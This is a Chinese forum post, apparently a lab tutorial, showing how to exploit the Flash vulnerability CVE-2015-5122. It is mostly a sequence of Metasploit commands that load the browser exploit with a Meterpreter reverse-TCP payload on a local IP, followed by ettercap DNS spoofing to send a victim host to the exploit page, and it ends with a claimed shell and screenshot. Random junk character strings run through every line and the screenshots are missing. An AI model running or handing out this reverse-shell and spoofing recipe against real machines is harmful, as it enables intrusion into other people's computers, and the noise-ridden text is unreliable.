cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

6 `+ L5 m5 q% C5 B j/ M8 G 二、cve2015-5122漏洞实例演示虚拟机 : L8 _8 g8 v, b6 q1 @

5 X. g) d# N9 T; C' c 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： $ B( q+ ^1 w. k# @- g! s* J

8 t+ g7 I) f H) @' z search cve-2015-5122如图： 3 i+ n# d# @ h% g

" P" N! j+ n1 z1 E) q$ M 4 @2 b5 V J" {- p) s* J3 t

/ R( J" P6 O2 l- P0 O 下面我们敲如下命令： 4 V! ?1 S t9 W( M

2 J9 o( _3 F% ]6 T6 M h) s8 K% D" Q use exploit/multi/browser/adobe_flash_opaque_background_uaf 5 B% w7 a1 ]3 X P" n2 Y n! M8 w

. | o1 \( r8 q8 h+ K' r2 G set PAYLOAD windows/meterpreter/reverse_tcp 4 e$ Z; C e/ t: n6 n7 W* K

5 F% H/ J1 H& V5 G set LHOST 192.168.0.109 2 ]9 [6 \) U1 r: z1 U$ k Z

( C7 U6 i! `0 I4 ]. } set URIPATH / /*根目录*/ * O" e' f" P, `: x" _7 C

# p9 t' B! F4 `$ F/ R$ h set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 # k) v/ n) |. Y1 D) l! U- @: A

5 K1 F% n; _7 r5 G% K; A set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 1 F* P6 |( D: _5 I; H

9 e/ f1 _5 @0 i3 t' Q9 k" s 然后show options如图： ) Z% y2 ]6 S; F7 z9 }7 R4 }

! V+ r2 }" d/ z2 D7 O( h7 w6 t6 K* \ + Q; j3 e+ z- t; \

( A" z! f) r: k j 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
9 @7 F9 ~8 ~1 O# [ g' h 5 U% V. l9 F! W: g, e

9 J, l1 m. A: [; e1 i 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 & v3 J9 r/ y u& R

: d& j+ `7 h; _% `$ P+ P8 ? Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf , x7 D8 w0 h4 R& A# T3 H% R

* G' w/ [3 r2 X% v8 \ ; x' l' V# f1 E1 R0 @

7 Q6 f7 O/ g6 h/ q 成功了，这时候我们断开ettercap，如图： + y9 ~6 ?2 L; O+ F1 q( O0 a

p) o) l: E1 C7 I6 R+ | ( m- V) N% A: f8 i- V$ W2 t% D

# C0 T7 _& B0 k) i; }/ p Screenshot如图： 7 V) ~! F, a/ p# z( L0 l9 `

2 f* @, b* a$ E I8 Z" E 2 f1 i+ I0 M1 E. F9 d( L, n/ J9 o

[$ T. D1 H' T " r! G' ^% ]) K6 A6 G1 e

		自动登录	找回密码
密码			立即注册